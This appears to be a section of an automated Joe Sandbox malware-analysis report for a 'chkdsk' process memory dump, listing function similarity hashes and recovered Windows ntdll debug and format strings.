                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: fb839a085930ed20db5861fede4344afef2c21a86577861b31715215ce8c4d11
                                              • Instruction ID: 9ced51243e574d7c8ba84bb47e3ae70e20c1c78aece52308c53a2e31c650b524
                                              • Opcode Fuzzy Hash: fb839a085930ed20db5861fede4344afef2c21a86577861b31715215ce8c4d11
                                              • Instruction Fuzzy Hash: F651E679A00A45AECB30DF5DC8919BFB7FAFF44200F54885AE49ED7641E674EA408760
                                              Strings
                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 054F4725
                                              • ExecuteOptions, xrefs: 054F46A0
                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 054F46FC
                                              • Execute=1, xrefs: 054F4713
                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 054F4787
                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 054F4742
                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 054F4655
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                              • API String ID: 0-484625025
                                              • Opcode ID: 2381d4ac4fda92e8e34ac38fb55bc2bfbdc3f10dbd9c8991b12592419d9a4448
                                              • Instruction ID: de6c22808f98dea0c3ddb36581440ac0e45b2f3ca783fa4e8dbe962d4f02703d
                                              • Opcode Fuzzy Hash: 2381d4ac4fda92e8e34ac38fb55bc2bfbdc3f10dbd9c8991b12592419d9a4448
                                              • Instruction Fuzzy Hash: 6851E9316042197AEF10EAA5DC99FFA77B9FF84310F1400EBD505A7290DBB1AA45CB61
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                              • Instruction ID: 3eefe6f58db4af3da7d15783396edb45cb423a631fa42206468b9a808a31039e
                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                              • Instruction Fuzzy Hash: 57022871608381AFC305CF29C4A4A6BBBE5FFC8720F54896EF9954B264DB31E905CB42
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-$0$0
                                              • API String ID: 1302938615-699404926
                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                              • Instruction ID: 0189fe11aa6cd4258acc6b5608dcf4995394bd43e67e378b9c2c68a2a708cee6
                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                              • Instruction Fuzzy Hash: 85816E78A462499ADF64CE68C8527FEBFA2FFC5310F9841DFD891A7390C63498418B61
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$[$]:%u
                                              • API String ID: 48624451-2819853543
                                              • Opcode ID: 976722ccc3a9a253f3e78e2ad0519f9cef2bdb0672873e7ff551ec8e5b341043
                                              • Instruction ID: 149114103b3f2ad75bb311fc04cc35147326fe0e6d316776b9b946893c0ca2b1
                                              • Opcode Fuzzy Hash: 976722ccc3a9a253f3e78e2ad0519f9cef2bdb0672873e7ff551ec8e5b341043
                                              • Instruction Fuzzy Hash: 7821537AA00619ABCB20DF69DD55AFEBBF9FF44640F04015AE909D3200EB30D9019BE1
                                              Strings
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 054F02BD
                                              • RTL: Re-Waiting, xrefs: 054F031E
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 054F02E7
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                              • API String ID: 0-2474120054
                                              • Opcode ID: 1fe3b6ec97a7305338dff20d8254f606bc7412a69f2e8e59f1f5aa345dd16c18
                                              • Instruction ID: 0c66698ed0b9b79eb0bcc7833843270a665c4583d304f0fbe846969501771fbc
                                              • Opcode Fuzzy Hash: 1fe3b6ec97a7305338dff20d8254f606bc7412a69f2e8e59f1f5aa345dd16c18
                                              • Instruction Fuzzy Hash: 98E1F335608741AFD765CF28C888BAAB7E1BF84314F140A5EF5968B3D1D774E849CB42
                                              Strings
                                              • RTL: Resource at %p, xrefs: 054F7B8E
                                              • RTL: Re-Waiting, xrefs: 054F7BAC
                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 054F7B7F
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 0-871070163
                                              • Opcode ID: 54fdb7e8a55f175525b2d298408f90caabe35bdd2b155b1d05624b6824f97062
                                              • Instruction ID: 8ac7f91ac80ced285918edfcf705072da04e8b692a1978f8064d77d88ef086f3
                                              • Opcode Fuzzy Hash: 54fdb7e8a55f175525b2d298408f90caabe35bdd2b155b1d05624b6824f97062
                                              • Instruction Fuzzy Hash: 7F419D357047029BE724DE298844BABB7E6FB89710F100A5EE956D7780DBB1E4058BA1
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 054F728C
                                              Strings
                                              • RTL: Resource at %p, xrefs: 054F72A3
                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 054F7294
                                              • RTL: Re-Waiting, xrefs: 054F72C1
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 885266447-605551621
                                              • Opcode ID: e1511d4af7b5e99258136ea1bf9d36f721ed4a37b074f6a63525238891dc8ed8
                                              • Instruction ID: 25f7596d7978077c4f64890cebcafade5baf2cadb56aee299eabb6e448c34ab9
                                              • Opcode Fuzzy Hash: e1511d4af7b5e99258136ea1bf9d36f721ed4a37b074f6a63525238891dc8ed8
                                              • Instruction Fuzzy Hash: D241DE35704202ABD725CE29CC41FEAB7A6FB84710F110A1AF955AB380DB65F812D7E2
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$]:%u
                                              • API String ID: 48624451-3050659472
                                              • Opcode ID: 5f2d4bb15da67612bc11c5c62cf6f815aa008d17caf3df8dd528ed3bd1a7b731
                                              • Instruction ID: 9f3a54a716d6435cb2bfdaffe1cafcc1eb12123c58aed0213b0f109170cb24f1
                                              • Opcode Fuzzy Hash: 5f2d4bb15da67612bc11c5c62cf6f815aa008d17caf3df8dd528ed3bd1a7b731
                                              • Instruction Fuzzy Hash: F7319576A006199FCB20DF29DC55BEEB7F8FF44650F54455AE84DE3200EB30AA449BA0
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-
                                              • API String ID: 1302938615-2137968064
                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                              • Instruction ID: 0b74438546aac93c37c1a695e5dd1448f68c4a00542ab59dfa4a4f275a7d3983
                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                              • Instruction Fuzzy Hash: 1A918079A042099BDBA4DE69C880AFFBFA6FBC5320F1445DFE855A7384D73089428B10
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $$@
                                              • API String ID: 0-1194432280
                                              • Opcode ID: 31c9bc3a2f36a5d8ce0446c41280094d0d8aa8215130b37f9cd85cd09a59b61f
                                              • Instruction ID: 1f30d2ade981cae97399bc675c1edf679b482977ae5d7fb21ac470bc606fd15b
                                              • Opcode Fuzzy Hash: 31c9bc3a2f36a5d8ce0446c41280094d0d8aa8215130b37f9cd85cd09a59b61f
                                              • Instruction Fuzzy Hash: EE814A75D046699BDB25DB54CC45BEEB7B8BB08710F0441EBE90AB7240D7709E85CFA0
                                              APIs
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0550CFBD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: true
                                              • Associated: 00000015.00000002.3751618566.0000000005579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.000000000557D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_21_2_5450000_chkdsk.jbxd
                                              Similarity
                                              • API ID: CallFilterFunc@8
                                              • String ID: @$@4_w@4_w
                                              • API String ID: 4062629308-713214301
                                              • Opcode ID: 5888bf006ef1806ee423f0c411775d16c1f94cac51bca9b8562f1ba90c1118a9
                                              • Instruction ID: 8ef06123a57035c768081ec5df1fb7fbc792d621d6837d9e8ba88249572a0450
                                              • Opcode Fuzzy Hash: 5888bf006ef1806ee423f0c411775d16c1f94cac51bca9b8562f1ba90c1118a9
                                              • Instruction Fuzzy Hash: AA41E171A00228DFCB25DFA5D845AAEBBB8FF45B10F00456FE905DB294E770D804DBA1